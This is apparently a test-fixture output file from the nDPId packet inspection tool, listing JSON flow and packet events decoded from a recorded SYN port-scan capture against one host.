-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1806,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1796,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAszkkAADsGPymsEAAIQA2GNIzSW87dUoMYAAAAAGACEADMwAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1807,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1063,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1807,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1797,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsUbIAADYGwMCsEAAIQA2GNIzSBCfdUoMYAAAAAGACDAAoaAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1808,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1808,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsplEAADUGbSGsEAAIQA2GNIzSE4vdUoMYAAAAAGACCAAdBAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1809,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1799,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsursAADMGWresEAAIQA2GNIzSxczdUoMYAAAAAGACEABiwgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1810,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1810,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1800,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsJh4AAC4G9FSsEAAIQA2GNIzSBIDdUoMYAAAAAGACDAAoDwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1811,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27353,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1811,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1801,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsq7AAACUGd8KsEAAIQA2GNIzSatndUoMYAAAAAGACCADFtQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1812,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1812,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1802,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAs3t0AADYGM5WsEAAIQA2GNIzSG1\/dUoMYAAAAAGACDAARMAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1813,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1813,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1803,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAsZAcAADUGr2usEAAIQA2GNIzSFxvdUoMYAAAAAGACCAAZdAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1814,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1814,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1804,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAs3XEAADEGOgGsEAAIQA2GNIzSBNLdUoMYAAAAAGACCAArvQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1815,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061109,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5925,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1815,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1805,"flow_packet_id":1,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061109,"pkt":"ACYLMQczACWzv5HuCABFAAAs7\/kAADEGJ3msEAAIQA2GNIzSFyXdUoMYAAAAAGACCAAZagAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1816,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061111,"flow_last_seen":1278275061111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061111,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1816,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1806,"flow_packet_id":1,"flow_last_seen":1278275061111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061111,"pkt":"ACYLMQczACWzv5HuCABFAAAs8psAADoGG9esEAAIQA2GNIzSxNXdUoMYAAAAAGACDABnuQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1817,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061153,"flow_last_seen":1278275061153,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061153,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1149,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1817,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1807,"flow_packet_id":1,"flow_last_seen":1278275061153,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061153,"pkt":"ACYLMQczACWzv5HuCABFAAAsvXUAADkGUf2sEAAIQA2GNIzTBH3dU4MZAAAAAGACCAAsDwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1808,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAs9iAAADMGH1KsEAAIQA2GNIzTQmHdU4MZAAAAAGACEADmKgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1809,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsvj8AADkGUTOsEAAIQA2GNIzTGWbdU4MZAAAAAGACCAAXJgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1810,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsM3gAADYG3vqsEAAIQA2GNIzT\/23dU4MZAAAAAGACDAAtHgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1811,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAszqIAADIGR9CsEAAIQA2GNIzTD0rdU4MZAAAAAGACDAAdQgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1822,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1057,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1822,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1812,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAs9AQAACkGK26sEAAIQA2GNIzTBCHdU4MZAAAAAGACCAAsawAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1823,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1823,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1813,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAs1iEAACcGS1GsEAAIQA2GNIzTF3TdU4MZAAAAAGACEAARGAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1824,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6789,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1824,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1814,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAs+tUAAC4GH52sEAAIQA2GNIzTGoXdU4MZAAAAAGACDAASBwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1825,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49167,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1825,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1815,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAso94AADIGcpSsEAAIQA2GNIzTwA\/dU4MZAAAAAGACDABsfAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1826,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1826,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1816,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsjjIAADgGgkCsEAAIQA2GNIzTPpLdU4MZAAAAAGACBAD1+QAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1827,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1817,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52822,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1827,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1817,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAslp4AADEGgNSsEAAIQA2GNIzTzlbdU4MZAAAAAGACCABiNQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1828,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1818,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3351,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1828,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1818,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsSfoAADIGzHisEAAIQA2GNIzTDRfdU4MZAAAAAGACDAAfdQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1829,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1829,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1819,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsZi0AAC0GtUWsEAAIQA2GNIzTF\/HdU4MZAAAAAGACCAAYmwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1830,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061154,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1830,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1820,"flow_packet_id":1,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061154,"pkt":"ACYLMQczACWzv5HuCABFAAAsQHUAADIG1f2sEAAIQA2GNIzTw1DdU4MZAAAAAGACDABpOwAAAgQFtA=="} 